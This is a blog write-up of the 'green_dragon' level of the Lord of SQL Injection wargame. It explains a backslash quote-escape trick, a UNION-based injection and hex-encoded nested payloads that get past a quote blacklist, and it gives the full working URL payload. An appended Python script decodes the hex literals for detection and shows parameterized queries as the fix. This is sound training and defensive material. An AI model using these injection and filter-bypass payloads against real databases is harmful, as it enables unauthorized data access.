
[Lord of SQL Injection] green_dragon

sh1256 2022. 2. 15. 20:12

 

Filtered: prob _ . ' "

 

select id,pw from prob_green_dragon where id='\' and pw=' or id=0x61646d696e%23'

--> id: \       pw: or id=0x61646d696e%23 (0x61646d696e is the hex encoding of admin; %23 is the URL-encoded #)

Result

 


[Example of how UNION works]

(figure: table1; query_1 -> query result_1; query_2 -> query result_2)

 

 

[Applying UNION]

 

select id,pw from prob_green_dragon where id='\' and pw=' union select 1,2#'

At last the injected row shows up in the query2 statement.



[Solving the problem]

Let's make query2 become: select id from prob_green_dragon where id='\' and pw=' union select 'admin'#'

 

1. ?id=\&&pw=union select '\', 'union select 'admin''#%23 --> ' and " (single and double quotes) are filtered, so send them as 0x values. --> The trailing 'admin' is replaced by 0x61646d696e, the 0x-encoded form of admin.

 

2. https://string-functions.com/string-hex.aspx

 


The value that has to go in is therefore:

select id,pw from prob_green_dragon where id='\' and pw=' union select 0x5c,0x756e696f6e2073656c6563742030783631363436643639366523#'

 

Enter it in this form:

URL?id=\&&pw=%20union%20select%200x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23
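As a defender-side illustration (added here; not code from the original post or from the challenge site), the script below reproduces the page's blacklist to show that the final payload passes it, decodes the 0x literals so a log reviewer sees what they hide, and runs the same two-stage lookup with bound parameters, where the payload stays plain data and never reaches the second query as SQL. The table rows are constructed sample data, and the table name is reused only for illustration.

```python
import re
import sqlite3
from typing import Optional

# Constructed sample rows standing in for the challenge table (not the real data).
ROWS = [("guest", "guest"), ("admin", "not-the-real-password")]

# The blacklist the page lists: prob _ . ' "  (note it never blocks 0x literals).
BLACKLIST = re.compile(r"prob|_|\.|'|\"", re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")

# The page's final payload, URL-decoded (id is a lone backslash, pw starts with a space).
PAYLOAD_ID = "\\"
PAYLOAD_PW = " union select 0x5c,0x756e696f6e2073656c6563742030783631363436643639366523#"

def passes_filter(value: str) -> bool:
    """True when the challenge-style blacklist lets the input through."""
    return BLACKLIST.search(value) is None

def build_vulnerable_query(id_: str, pw: str) -> str:
    """String concatenation as the page's queries show; returns the SQL text only."""
    return f"select id,pw from prob_green_dragon where id='{id_}' and pw='{pw}'"

def decode_hex_literals(value: str) -> str:
    """Detection aid: render each 0x... literal as text so a reviewer sees what it hides."""
    def _decode(m: re.Match) -> str:
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)  # odd digit count cannot be bytes; leave it untouched
        return bytes.fromhex(digits).decode("utf-8", errors="replace")
    return HEX_LITERAL.sub(_decode, value)

def two_stage_lookup(id_: str, pw: str) -> Optional[str]:
    """Hardened version of the two-query flow: every value is bound as a parameter."""
    con = sqlite3.connect(":memory:")
    con.execute("create table prob_green_dragon (id text, pw text)")
    con.executemany("insert into prob_green_dragon values (?, ?)", ROWS)
    row = con.execute("select id,pw from prob_green_dragon where id=? and pw=?", (id_, pw)).fetchone()
    if row is None:
        return None
    # The second query uses the stored id/pw, again as parameters, so stage one
    # cannot smuggle SQL text into stage two.
    row2 = con.execute("select id from prob_green_dragon where id=? and pw=?", row).fetchone()
    return row2[0] if row2 else None
```

Running decode_hex_literals twice on the payload peels both layers (first "union select 0x61646d696e#", then "admin"), which is the signal a WAF or log review can key on even when the quote filter reports nothing.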

 

 

Success!!